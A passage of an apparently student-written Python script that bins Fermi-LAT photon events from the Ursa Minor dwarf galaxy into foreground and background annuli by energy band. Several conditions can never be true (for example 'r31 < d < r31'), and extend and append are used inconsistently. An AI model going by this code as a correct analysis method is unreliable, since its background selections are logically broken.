Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version3.txt\")\nmaxR1V3 = numpy.asmatrix(maxR1V3)\nmaxR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version4.txt\")\nmaxR1V4 = numpy.asmatrix(maxR1V4)\nmaxR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version1.txt\")\nmaxR2V1 = numpy.asmatrix(maxR2V1)\nmaxR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version2.txt\")\nmaxR2V2 = numpy.asmatrix(maxR2V2)\nmaxR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version3.txt\")\nmaxR2V3 = numpy.asmatrix(maxR2V3)\nmaxR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version4.txt\")\nmaxR2V4 = numpy.asmatrix(maxR2V4)\nmaxR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version1.txt\")\nmaxR3V1 = numpy.asmatrix(maxR3V1)\nmaxR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version2.txt\")\nmaxR3V2 = numpy.asmatrix(maxR3V2)\nmaxR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version3.txt\")\nmaxR3V3 = numpy.asmatrix(maxR3V3)\nmaxR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version4.txt\")\nmaxR3V4 = numpy.asmatrix(maxR3V4)\n#band width\nlowband = 2.15-1.0 #GeV\nmidband = 4.64-2.15\nhieband = 10.0-4.64\nmaxband = 21.5-10\n#exposure\nlowexposure = float(1.22*10**11)\nmidexposure = float(1.32*10**11)\nhieexposure = float(1.33*10**11)\nmaxexposure = float(1.34*10**11)\n#pixels\nr11 = 2.5\nr21 = 3.75\nr31 = 5.00\nr12 = 1.5\nr22 = 2.25\nr32 = 3.0\nr13 = 1.0\nr23 = 1.5\nr33 = 2.0\nr14 = 0.8\nr24 = 1.2\nr34 = 1.6\nareaV1fore = pi*(r11**2)\nareaV1back = pi*(r31**2)-pi*(r21**2)\nareaV2fore = pi*(r12**2)\nareaV2back = pi*(r32**2)-pi*(r22**2)\nareaV3fore = pi*(r13**2)\nareaV3back = pi*(r33**2)-pi*(r23**2)\nareaV4fore = pi*(r14**2)\nareaV4back = pi*(r34**2)-pi*(r24**2)\n\npixV1fore = areaV1fore / 0.09 #number of pixels\npixV1back = areaV1back / 0.09\npixV2fore = areaV2fore / 0.09\npixV2back = areaV2back / 0.09\npixV3fore = areaV3fore / 0.09\npixV3back = areaV3back / 0.09\npixV4fore = areaV4fore / 0.09\npixV4back = areaV4back / 0.09\n#distance formula definition\ndef dist(x1,y1,x2,y2):\n return sqrt((x1-x2)**2+(y1-y2)**2)\n###############################################################################\n#begin analysis\n###############################################################################\n#average values form at center\nx = 0\nsumlong = 0\nindex = 0\nwhile x < len(lowR1V1):\n sumlong = sumlong + lowR1V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(lowR2V1):\n sumlong = sumlong + lowR2V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(lowR3V1):\n sumlong = sumlong + lowR3V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(midR1V1):\n sumlong = sumlong + midR1V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(midR2V1):\n sumlong = sumlong + midR2V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(midR3V1):\n sumlong = sumlong + midR3V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(hieR1V1):\n sumlong = sumlong + hieR1V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(hieR2V1):\n sumlong = sumlong + hieR2V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(hieR3V1):\n sumlong = sumlong + hieR3V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(maxR1V1):\n sumlong = sumlong + maxR1V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(maxR2V1):\n sumlong = sumlong + maxR2V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nwhile x < len(maxR3V1):\n sumlong = sumlong + maxR3V1[x,1]\n index = index + 1\n x = x + 1\nx = 0\nsumlat = 0\nwhile x < len(lowR1V1):\n sumlat = sumlat + lowR1V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(lowR2V1):\n sumlat = sumlat + lowR2V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(lowR3V1):\n sumlat = sumlat + lowR3V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(midR1V1):\n sumlat = sumlat + midR1V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(midR2V1):\n sumlat = sumlat + midR2V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(midR3V1):\n sumlat = sumlat + midR3V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(hieR1V1):\n sumlat = sumlat + hieR1V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(hieR2V1):\n sumlat = sumlat + hieR2V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(hieR3V1):\n sumlat = sumlat + hieR3V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(maxR1V1):\n sumlat = sumlat + maxR1V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(maxR2V1):\n sumlat = sumlat + maxR2V1[x,2]\n x = x + 1\nx = 0\nwhile x < len(maxR3V1):\n sumlat = sumlat + maxR3V1[x,2]\n x = x + 1\navgx = sumlong / index\navgy = sumlat / index\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n#version 1\n#separating into foreground and background\nlowR1V1fore = []\nlowR1V1back = []\nx = 0\nwhile x < len(lowR1V1): \n if dist(avgx,avgy,lowR1V1[x,1],lowR1V1[x,2]) < r11:\n lowR1V1fore.append(lowR1V1[x])\n if r21 < dist(avgx,avgy,lowR1V1[x,1],lowR1V1[x,2]) < r31:\n lowR1V1back.append(lowR1V1[x])\n x = x + 1\nlowR2V1fore = []\nlowR2V1back = []\nx = 0\nwhile x < len(lowR2V1):\n if dist(avgx,avgy,lowR2V1[x,1],lowR2V1[x,2]) < r11:\n lowR2V1fore.append(lowR2V1[x])\n if r21 < dist(avgx,avgy,lowR2V1[x,1],lowR2V1[x,2]) < r31:\n lowR2V1back.append(lowR2V1[x])\n x = x + 1\nlowR3V1fore = []\nlowR3V1back = []\nx = 0\nwhile x < len(lowR3V1):\n if dist(avgx,avgy,lowR3V1[x,1],lowR3V1[x,2]) < r11:\n lowR3V1fore.append(lowR3V1[x])\n if r31 < dist(avgx,avgy,lowR3V1[x,1],lowR3V1[x,2]) < r31:\n lowR3V1back.append(lowR3V1[x])\n x = x + 1\nlowV1fore = lowR1V1fore\nlowV1back = lowR2V1back\n\nmidR1V1fore = []\nmidR1V1back = []\nx = 0\nwhile x < len(midR1V1): \n if dist(avgx,avgy,midR1V1[x,1],midR1V1[x,2]) < r12:\n midR1V1fore.append(midR1V1[x])\n if r22 < dist(avgx,avgy,midR1V1[x,1],midR1V1[x,2]) < r32:\n midR1V1back.append(midR1V1[x])\n x = x + 1\nmidR2V1fore = []\nmidR2V1back = []\nx = 0\nwhile x < len(midR2V1):\n if dist(avgx,avgy,midR2V1[x,1],midR2V1[x,2]) < r12:\n midR2V1fore.append(midR2V1[x])\n if r22 < dist(avgx,avgy,midR2V1[x,1],midR2V1[x,2]) < r32:\n midR2V1back.append(midR2V1[x])\n x = x + 1\nmidR3V1fore = []\nmidR3V1back = []\nx = 0\nwhile x < len(midR3V1):\n if dist(avgx,avgy,midR3V1[x,1],midR3V1[x,2]) < r12:\n midR3V1fore.append(midR3V1[x])\n if r32 < dist(avgx,avgy,midR3V1[x,1],midR3V1[x,2]) < r32:\n midR3V1back.append(midR3V1[x])\n x = x + 1\nmidV1fore = midR1V1fore\nmidV1back = midR2V1back\n\nhieR1V1fore = []\nhieR1V1back = []\nx = 0\nwhile x < len(hieR1V1): \n if dist(avgx,avgy,hieR1V1[x,1],hieR1V1[x,2]) < r13:\n hieR1V1fore.append(hieR1V1[x])\n if r23 < dist(avgx,avgy,hieR1V1[x,1],hieR1V1[x,2]) < r33:\n hieR1V1back.append(hieR1V1[x])\n x = x + 1\nhieR2V1fore = []\nhieR2V1back = []\nx = 0\nwhile x < len(hieR2V1):\n if dist(avgx,avgy,hieR2V1[x,1],hieR2V1[x,2]) < r13:\n hieR2V1fore.append(hieR2V1[x])\n if r23 < dist(avgx,avgy,hieR2V1[x,1],hieR2V1[x,2]) < r33:\n hieR2V1back.append(hieR2V1[x])\n x = x + 1\nhieR3V1fore = []\nhieR3V1back = []\nx = 0\nwhile x < len(hieR3V1):\n if dist(avgx,avgy,hieR3V1[x,1],hieR3V1[x,2]) < r13:\n hieR3V1fore.append(hieR3V1[x])\n if r33 < dist(avgx,avgy,hieR3V1[x,1],hieR3V1[x,2]) < r33:\n hieR3V1back.append(hieR3V1[x])\n x = x + 1\nhieV1fore = hieR1V1fore\nhieV1back = hieR2V1back\n\nmaxR1V1fore = []\nmaxR1V1back = []\nx = 0\nwhile x < len(maxR1V1): \n if dist(avgx,avgy,maxR1V1[x,1],maxR1V1[x,2]) < r14:\n maxR1V1fore.extend(maxR1V1[x])\n if r24 < dist(avgx,avgy,maxR1V1[x,1],maxR1V1[x,2]) < r34:\n maxR1V1back.append(maxR1V1[x])\n x = x + 1\nmaxR2V1fore = []\nmaxR2V1back = []\nx = 0\nwhile x < len(maxR2V1):\n if dist(avgx,avgy,maxR2V1[x,1],maxR2V1[x,2]) < r14:\n maxR2V1fore.append(maxR2V1[x])\n if r24 < dist(avgx,avgy,maxR2V1[x,1],maxR2V1[x,2]) < r34:\n maxR2V1back.append(maxR2V1[x])\n x = x + 1\nmaxR3V1fore = []\nmaxR3V1back = []\nx = 0\nwhile x < len(maxR3V1):\n if dist(avgx,avgy,maxR3V1[x,1],maxR3V1[x,2]) < r14:\n maxR3V1fore.append(maxR3V1[x])\n if r34 < dist(avgx,avgy,maxR3V1[x,1],maxR3V1[x,2]) < r34:\n maxR3V1back.append(maxR3V1[x])\n x = x + 1\nmaxV1fore = maxR1V1fore\nmaxV1back = maxR2V1back\n#version2\nlowR1V2fore = []\nlowR1V2back = []\nx = 0\nwhile x < len(lowR1V2): \n if dist(avgx,avgy,lowR1V2[x,1],lowR1V2[x,2]) < r11:\n lowR1V2fore.append(lowR1V2[x])\n if r21 < dist(avgx,avgy,lowR1V2[x,1],lowR1V2[x,2]) < r31:\n lowR1V2back.append(lowR1V2[x])\n x = x + 1\nlowR2V2fore = []\nlowR2V2back = []\nx = 0\nwhile x < len(lowR2V2):\n if dist(avgx,avgy,lowR2V2[x,1],lowR2V2[x,2]) < r11:\n lowR2V2fore.append(lowR2V2[x])\n if r21 < dist(avgx,avgy,lowR2V2[x,1],lowR2V2[x,2]) < r31:\n lowR2V2back.append(lowR2V2[x])\n x = x + 1\nlowR3V2fore = []\nlowR3V2back = []\nx = 0\nwhile x < len(lowR3V2):\n if dist(avgx,avgy,lowR3V2[x,1],lowR3V2[x,2]) < r11:\n lowR3V2fore.append(lowR3V2[x])\n if r31 < dist(avgx,avgy,lowR3V2[x,1],lowR3V2[x,2]) < r31:\n lowR3V2back.append(lowR3V2[x])\n x = x + 1\nlowV2fore = lowR1V2fore\nlowV2back = lowR2V2back\n\nmidR1V2fore = []\nmidR1V2back = []\nx = 0\nwhile x < len(midR1V2): \n if dist(avgx,avgy,midR1V2[x,1],midR1V2[x,2]) < r12:\n midR1V2fore.append(midR1V2[x])\n if r22 < dist(avgx,avgy,midR1V2[x,1],midR1V2[x,2]) < r32:\n midR1V2back.append(midR1V2[x])\n x = x + 1\nmidR2V2fore = []\nmidR2V2back = []\nx = 0\nwhile x < len(midR2V2):\n if dist(avgx,avgy,midR2V2[x,1],midR2V2[x,2]) < r12:\n midR2V2fore.append(midR2V2[x])\n if r22 < dist(avgx,avgy,midR2V2[x,1],midR2V2[x,2]) < r32:\n midR2V2back.append(midR2V2[x])\n x = x + 1\nmidR3V2fore = []\nmidR3V2back = []\nx = 0\nwhile x < len(midR3V2):\n if dist(avgx,avgy,midR3V2[x,1],midR3V2[x,2]) < r12:\n midR3V2fore.append(midR3V2[x])\n if r32 < dist(avgx,avgy,midR3V2[x,1],midR3V2[x,2]) < r32:\n midR3V2back.append(midR3V2[x])\n x = x + 1\nmidV2fore = midR1V2fore\nmidV2back = midR2V2back\n\nhieR1V2fore = []\nhieR1V2back = []\nx = 0\nwhile x < len(hieR1V2): \n if dist(avgx,avgy,hieR1V2[x,1],hieR1V2[x,2]) < r13:\n hieR1V2fore.append(hieR1V2[x])\n if r23 < dist(avgx,avgy,hieR1V2[x,1],hieR1V2[x,2]) < r33:\n hieR1V2back.append(hieR1V2[x])\n x = x + 1\nhieR2V2fore = []\nhieR2V2back = []\nx = 0\nwhile x < len(hieR2V2):\n if dist(avgx,avgy,hieR2V2[x,1],hieR2V2[x,2]) < r13:\n hieR2V2fore.append(hieR2V2[x])\n if r23 < dist(avgx,avgy,hieR2V2[x,1],hieR2V2[x,2]) < r33:\n hieR2V2back.append(hieR2V2[x])\n x = x + 1\nhieR3V2fore = []\nhieR3V2back = []\nx = 0\nwhile x < len(hieR3V2):\n if dist(avgx,avgy,hieR3V2[x,1],hieR3V2[x,2]) < r13:\n hieR3V2fore.append(hieR3V2[x])\n if r33 < dist(avgx,avgy,hieR3V2[x,1],hieR3V2[x,2]) < r33:\n hieR3V2back.append(hieR3V2[x])\n x = x + 1\nhieV2fore = hieR1V2fore\nhieV2back = hieR2V2back\n\nmaxR1V2fore = []\nmaxR1V2back = []\nx = 0\nwhile x < len(maxR1V2): \n if dist(avgx,avgy,maxR1V2[x,1],maxR1V2[x,2]) < r14:\n maxR1V2fore.extend(maxR1V2[x])\n if r24 < dist(avgx,avgy,maxR1V2[x,1],maxR1V2[x,2]) < r34:\n maxR1V2back.append(maxR1V2[x])\n x = x + 1\nmaxR2V2fore = []\nmaxR2V2back = []\nx = 0\nwhile x < len(maxR2V2):\n if dist(avgx,avgy,maxR2V2[x,1],maxR2V2[x,2]) < r14:\n maxR2V2fore.append(maxR2V2[x])\n if r24 < dist(avgx,avgy,maxR2V2[x,1],maxR2V2[x,2]) < r34:\n maxR2V2back.append(maxR2V2[x])\n x = x + 1\nmaxR3V2fore = []\nmaxR3V2back = []\nx = 0\nwhile x < len(maxR3V2):\n if dist(avgx,avgy,maxR3V2[x,1],maxR3V2[x,2]) < r14:\n maxR3V2fore.append(maxR3V2[x])\n if r34 < dist(avgx,avgy,maxR3V2[x,1],maxR3V2[x,2]) < r34:\n maxR3V2back.append(maxR3V2[x])\n x = x + 1\nmaxV2fore = maxR1V2fore\nmaxV2back = maxR2V2back\n#version3\nlowR1V3fore = []\nlowR1V3back = []\nx = 0\nwhile x < len(lowR1V3): \n if dist(avgx,avgy,lowR1V3[x,1],lowR1V3[x,2]) < r11:\n lowR1V3fore.append(lowR1V3[x])\n if r21 < dist(avgx,avgy,lowR1V3[x,1],lowR1V3[x,2]) < r31:\n lowR1V3back.append(lowR1V3[x])\n x = x + 1\nlowR2V3fore = []\nlowR2V3back = []\nx = 0\nwhile x < len(lowR2V3):\n if dist(avgx,avgy,lowR2V3[x,1],lowR2V3[x,2]) < r11:\n lowR2V3fore.append(lowR2V3[x])\n if r21 < dist(avgx,avgy,lowR2V3[x,1],lowR2V3[x,2]) < r31:\n lowR2V3back.append(lowR2V3[x])\n x = x + 1\nlowR3V3fore = []\nlowR3V3back = []\nx = 0\nwhile x < len(lowR3V3):\n if dist(avgx,avgy,lowR3V3[x,1],lowR3V3[x,2]) < r11:\n lowR3V3fore.append(lowR3V3[x])\n if r31 < dist(avgx,avgy,lowR3V3[x,1],lowR3V3[x,2]) < r31:\n lowR3V3back.append(lowR3V3[x])\n x = x + 1\nlowV3fore = lowR1V3fore\nlowV3back = lowR2V3back\n\nmidR1V3fore = []\nmidR1V3back = []\nx = 0\nwhile x < len(midR1V3): \n if dist(avgx,avgy,midR1V3[x,1],midR1V3[x,2]) < r12:\n midR1V3fore.append(midR1V3[x])\n if r22 < dist(avgx,avgy,midR1V3[x,1],midR1V3[x,2]) < r32:\n midR1V3back.append(midR1V3[x])\n x = x + 1\nmidR2V3fore = []\nmidR2V3back = []\nx = 0\nwhile x < len(midR2V3):\n if dist(avgx,avgy,midR2V3[x,1],midR2V3[x,2]) < r12:\n midR2V3fore.append(midR2V3[x])\n if r22 < dist(avgx,avgy,midR2V3[x,1],midR2V3[x,2]) < r32:\n midR2V3back.append(midR2V3[x])\n x = x + 1\nmidR3V3fore = []\nmidR3V3back = []\nx = 0\nwhile x < len(midR3V3):\n if dist(avgx,avgy,midR3V3[x,1],midR3V3[x,2]) < r12:\n midR3V3fore.append(midR3V3[x])\n if r32 < dist(avgx,avgy,midR3V3[x,1],midR3V3[x,2]) < r32:\n midR3V3back.append(midR3V3[x])\n x = x + 1\nmidV3fore = midR1V3fore\nmidV3back = midR2V3back\n\nhieR1V3fore = []\nhieR1V3back = []\nx = 0\nwhile x < len(hieR1V3): \n if dist(avgx,avgy,hieR1V3[x,1],hieR1V3[x,2]) < r13:\n hieR1V3fore.append(hieR1V3[x])\n if r23 < dist(avgx,avgy,hieR1V3[x,1],hieR1V3[x,2]) < r33:\n hieR1V3back.append(hieR1V3[x])\n x = x + 1\nhieR2V3fore = []\nhieR2V3back = []\nx = 0\nwhile x < len(hieR2V3):\n if dist(avgx,avgy,hieR2V3[x,1],hieR2V3[x,2]) < r13:\n hieR2V3fore.append(hieR2V3[x])\n if r23 < dist(avgx,avgy,hieR2V3[x,1],hieR2V3[x,2]) < r33:\n hieR2V3back.append(hieR2V3[x])\n x = x + 1\nhieR3V3fore = []\nhieR3V3back = []\nx = 0\nwhile x < len(hieR3V3):\n if dist(avgx,avgy,hieR3V3[x,1],hieR3V3[x,2]) < r13:\n hieR3V3fore.append(hieR3V3[x])\n if r33 < dist(avgx,avgy,hieR3V3[x,1],hieR3V3[x,2]) < r33:\n hieR3V3back.append(hieR3V3[x])\n x = x + 1\nhieV3fore = hieR1V3fore\nhieV3back = hieR2V3back\n\nmaxR1V3fore = []\nmaxR1V3back = []\nx = 0\nwhile x < len(maxR1V3): \n if dist(avgx,avgy,maxR1V3[x,1],maxR1V3[x,2]) < r14:\n maxR1V3fore.extend(maxR1V3[x])\n if r24 < dist(avgx,avgy,maxR1V3[x,1],maxR1V3[x,2]) < r34:\n maxR1V3back.append(maxR1V3[x])\n x = x + 1\nmaxR2V3fore = []\nmaxR2V3back = []\nx = 0\nwhile x < len(maxR2V3):\n if dist(avgx,avgy,maxR2V3[x,1],maxR2V3[x,2]) < r14:\n maxR2V3fore.append(maxR2V3[x])\n if r24 < dist(avgx,avgy,maxR2V3[x,1],maxR2V3[x,2]) < r34:\n maxR2V3back.append(maxR2V3[x])\n x = x + 1\nmaxR3V3fore = []\nmaxR3V3back = []\nx = 0\nwhile x < len(maxR3V3):\n if dist(avgx,avgy,maxR3V3[x,1],maxR3V3[x,2]) < r14:\n maxR3V3fore.append(maxR3V3[x])\n if r34 < dist(avgx,avgy,maxR3V3[x,1],maxR3V3[x,2]) < r34:\n maxR3V3back.append(maxR3V3[x])\n x = x + 1\nmaxV3fore = maxR1V3fore\nmaxV3back = maxR2V3back\n#version4\nlowR1V4fore = []\nlowR1V4back = []\nx = 0\nwhile x < len(lowR1V4): \n if dist(avgx,avgy,lowR1V4[x,1],lowR1V4[x,2]) < r11:\n lowR1V4fore.append(lowR1V4[x])\n if r21 < dist(avgx,avgy,lowR1V4[x,1],lowR1V4[x,2]) < r31:\n lowR1V4back.append(lowR1V4[x])\n x = x + 1\nlowR2V4fore = []\nlowR2V4back = []\nx = 0\nwhile x < len(lowR2V4):\n if dist(avgx,avgy,lowR2V4[x,1],lowR2V4[x,2]) < r11:\n lowR2V4fore.append(lowR2V4[x])\n if r21 < dist(avgx,avgy,lowR2V4[x,1],lowR2V4[x,2]) < r31:\n lowR2V4back.append(lowR2V4[x])\n x = x + 1\nlowR3V4fore = []\nlowR3V4back = []\nx = 0\nwhile x < len(lowR3V4):\n if dist(avgx,avgy,lowR3V4[x,1],lowR3V4[x,2]) < r11:\n lowR3V4fore.append(lowR3V4[x])\n if r31 < dist(avgx,avgy,lowR3V4[x,1],lowR3V4[x,2]) < r31:\n lowR3V4back.append(lowR3V4[x])\n x = x + 1\nlowV4fore = lowR1V4fore\nlowV4back = lowR2V4back\n\nmidR1V4fore = []\nmidR1V4back = []\nx = 0\nwhile x < len(midR1V4): \n if dist(avgx,avgy,midR1V4[x,1],midR1V4[x,2]) < r12:\n midR1V4fore.append(midR1V4[x])\n if r22 < dist(avgx,avgy,midR1V4[x,1],midR1V4[x,2]) < r32:\n midR1V4back.append(midR1V4[x])\n x = x + 1\nmidR2V4fore = []\nmidR2V4back = []\nx = 0\nwhile x < len(midR2V4):\n if dist(avgx,avgy,midR2V4[x,1],midR2V4[x,2]) < r12:\n midR2V4fore.append(midR2V4[x])\n if r22 < dist(avgx,avgy,midR2V4[x,1],midR2V4[x,2]) < r32:\n midR2V4back.append(midR2V4[x])\n x = x + 1\nmidR3V4fore = []\nmidR3V4back = []\nx = 0\nwhile x < len(midR3V4):\n if dist(avgx,avgy,midR3V4[x,1],midR3V4[x,2]) < r12:\n midR3V4fore.append(midR3V4[x])\n if r32 < dist(avgx,avgy,midR3V4[x,1],midR3V4[x,2]) < r32:\n midR3V4back.append(midR3V4[x])\n x = x + 1\nmidV4fore = midR1V4fore\nmidV4back = midR2V4back\n\nhieR1V4fore = []\nhieR1V4back = []\nx = 0\nwhile x < len(hieR1V4): \n if dist(avgx,avgy,hieR1V4[x,1],hieR1V4[x,2]) < r13:\n hieR1V4fore.append(hieR1V4[x])\n if r23 < dist(avgx,avgy,hieR1V4[x,1],hieR1V4[x,2]) < r33:\n hieR1V4back.append(hieR1V4[x])\n x = x + 1\nhieR2V4fore = []\nhieR2V4back = []\nx = 0\nwhile x < len(hieR2V4):\n if dist(avgx,avgy,hieR2V4[x,1],hieR2V4[x,2]) < r13:\n hieR2V4fore.append(hieR2V4[x])\n if r23 < dist(avgx,avgy,hieR2V4[x,1],hieR2V4[x,2]) < r33:\n hieR2V4back.append(hieR2V4[x])\n x = x + 1\nhieR3V4fore = []\nhieR3V4back = []\nx = 0\nwhile x < len(hieR3V4):\n if dist(avgx,avgy,hieR3V4[x,1],hieR3V4[x,2]) < r13:\n hieR3V4fore.append(hieR3V4[x])\n if r33 < dist(avgx,avgy,hieR3V4[x,1],hieR3V4[x,2]) < r33:\n hieR3V4back.append(hieR3V4[x])\n x = x + 1\nhieV4fore = hieR1V4fore\nhieV4back = hieR2V4back\n\nmaxR1V4fore = []\nmaxR1V4back = []\nx = 0\nwhile x < len(maxR1V4): \n if dist(avgx,avgy,maxR1V4[x,1],maxR1V4[x,2]) < r14:\n maxR1V4fore.extend(maxR1V4[x])\n if r24 < dist(avgx,avgy,maxR1V4[x,1],maxR1V4[x,2]) < r34:\n maxR1V4back.append(maxR1V4[x])\n x = x + 1\nmaxR2V4fore = []\nmaxR2V4back = []\nx = 0\nwhile x < len(maxR2V4):\n if dist(avgx,avgy,maxR2V4[x,1],maxR2V4[x,2]) < r14:\n maxR2V4fore.append(maxR2V4[x])\n if r24 < dist(avgx,avgy,maxR2V4[x,1],maxR2V4[x,2]) < r34:\n maxR2V4back.append(maxR2V4[x])\n x = x + 1\nmaxR3V4fore = []\nmaxR3V4back = []\nx = 0\nwhile x < len(maxR3V4):\n if dist(avgx,avgy,maxR3V4[x,1],maxR3V4[x,2]) < r14:\n maxR3V4fore.append(maxR3V4[x])\n if r34 < dist(avgx,avgy,maxR3V4[x,1],maxR3V4[x,2]) < r34:\n maxR3V4back.append(maxR3V4[x])\n x = x + 1\nmaxV4fore = maxR1V4fore\nmaxV4back = maxR2V4back\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n#version1\nrightlowV1fore = []\nrightlowV1back = []\nrightmidV1fore = []\nrightmidV1back = []\nrighthieV1fore = []\nrighthieV1back = []\nrightmaxV1fore = []\nrightmaxV1back = []\nx = 0\nwhile x < len(lowV1fore):\n temp = numpy.array(lowV1fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV1back):\n temp = numpy.array(lowV1back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV1fore):\n temp = numpy.array(midV1fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV1back):\n temp = numpy.array(midV1back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV1fore):\n temp = numpy.array(hieV1fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV1back):\n temp = numpy.array(hieV1back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV1fore):\n temp = numpy.array(maxV1fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV1back):\n temp = numpy.array(maxV1back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\n#version2\nrightlowV2fore = []\nrightlowV2back = []\nrightmidV2fore = []\nrightmidV2back = []\nrighthieV2fore = []\nrighthieV2back = []\nrightmaxV2fore = []\nrightmaxV2back = []\nx = 0\nwhile x < len(lowV2fore):\n temp = numpy.array(lowV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n 